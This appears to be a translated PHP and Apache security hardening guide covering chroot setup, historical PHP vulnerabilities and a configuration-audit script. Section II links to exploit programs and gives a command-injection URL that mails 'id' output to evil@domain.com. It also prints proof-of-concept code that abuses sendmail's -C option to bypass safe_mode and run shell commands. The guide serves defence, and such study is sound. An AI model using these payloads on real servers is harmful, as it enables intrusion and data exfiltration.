I. Web server security
PHP is really just a module of the Web server, so the security of the Web server must be ensured first. Of course, securing the Web server in turn requires securing the system, but that would take us too far afield. PHP can be combined with various Web servers; here we only discuss Apache. We strongly recommend installing and starting Apache in a chroot environment. That way, even if Apache, PHP, or their scripts contain vulnerabilities, only the jailed system is affected and the actual system is not harmed. However, running Apache in a chroot can also cause some trouble. For example, when connecting to mysql you must use the 127.0.0.1 address so that a tcp connection is used, instead of using localhost for a socket connection, which is slightly less efficient. Sending email with the mail function is also a problem, because in php.ini:
[mail function]
; For Win32 only.
SMTP = localhost
; For Win32 only.
sendmail_from = me@localhost.com
Both settings apply only to the Win32 platform, so sendmail has to be set up properly inside the chroot environment.
II. Problems in PHP itself
1. Remote overflow
All versions below PHP-4.1.2 have a remote buffer overflow vulnerability in file upload. The attack program has spread widely and its success rate is very high:
Packetstormsecurity.org/0204-exploits/7350fun
Hsj.shadowpenguin.org/misc/php3018_exp.txt
2. Remote denial of service
PHP-4.2.0 and PHP-4.2.1 have a remote vulnerability in the handling of multipart/form-data POST requests. It does not yield local user permissions, but it can cause a denial of service.
3. safe_mode bypass vulnerability
Versions below PHP-4.2.2 also have a vulnerability in which the PHP mail function bypasses the safe_mode restriction to execute commands. Starting with version 4.0.5 the mail function gained a fifth parameter, and because of an oversight in its design it can be used to break through the safe_mode restriction and execute commands. On 4.0.5 the bypass is very simple: you only need to separate with a semicolon and append a shell command. For example, suppose the PHP script evil.php exists:
Request the following URL:
foo.com/evil.php?bar=;/usr/bin/id|mail evil@domain.com
This sends the output of running id to evil@domain.com.
For PHP from 4.0.6 to 4.2.2, breaking through the safe_mode restriction actually relies on the -C parameter of sendmail, so the system must be using sendmail. The following code breaks through the safe_mode restriction to execute a command:
# Note: the following two files must not exist, or their owner must be the same as the owner of this script.
$script = '/tmp/script123';
$cf = '/tmp/cf123';
$fd = fopen($cf, 'w');
fwrite($fd, 'Oss/tmp
Sparse=0
R$*' . chr(9) . '$#local $@ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script');
fclose($fd);
$fd = fopen($script, 'w');
fwrite($fd, 'rm -f $script $cf;');
fwrite($fd, $cmd);
fclose($fd);
mail('nobody', '', '-C $cf');
?>
You must upgrade PHP to the latest version.
III. Security configuration of PHP itself
PHP configuration is very flexible. Options can be set in php.ini, httpd.conf, and .htaccess files (AllowOverride All or Options must be set for the directory), and also from within a script using ini_set() and other specific functions. You can use the phpinfo() and get_cfg_var() functions to obtain the values of the configuration options.
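Because an option can be set in so many places, it helps to check whether the value in effect is the one written in php.ini. The script below is an added example, not code from the original article: it compares get_cfg_var() (the value read from the configuration file) with ini_get() (the value in effect for the current request) and flags differences. The helper names and the directive list, taken from settings named on this page, are assumptions; safe_mode was removed in PHP 5.4 and is reported as unavailable there.

```php
<?php
// Added example: flag directives whose effective value differs from the
// configuration file, i.e. that were overridden in httpd.conf, .htaccess
// or by ini_set(). Function names here are hypothetical.

// Directives named on this page; extend the list for your own audit.
$directives = array('safe_mode', 'SMTP', 'sendmail_from');

// Normalise the spellings PHP accepts for booleans so "On" and "1" compare equal.
function normalise($value)
{
    if ($value === false || $value === null) {
        return null;                       // directive unknown or not set
    }
    $v = strtolower(trim((string) $value));
    if (in_array($v, array('1', 'on', 'yes', 'true'), true)) {
        return '1';
    }
    if (in_array($v, array('', '0', 'off', 'no', 'false', 'none'), true)) {
        return '0';
    }
    return (string) $value;
}

function audit_directives($names)
{
    $report = array();
    foreach ($names as $name) {
        $file = normalise(get_cfg_var($name)); // as written in the config file
        $live = normalise(ini_get($name));     // in effect for this request
        if ($live === null) {
            $status = 'not available in this PHP build';
        } elseif ($file === $live) {
            $status = 'matches php.ini';
        } elseif ($file === null) {
            $status = 'not set in php.ini (default or set elsewhere)';
        } else {
            $status = 'OVERRIDDEN outside php.ini';
        }
        $report[$name] = array($file, $live, $status);
    }
    return $report;
}

foreach (audit_directives($directives) as $name => $row) {
    printf("%-14s php.ini=%-12s effective=%-12s %s\n",
        $name, var_export($row[0], true), var_export($row[1], true), $row[2]);
}
```

Run it through the Web server rather than the command line, so that httpd.conf and .htaccess overrides for that directory are in effect when the comparison is made.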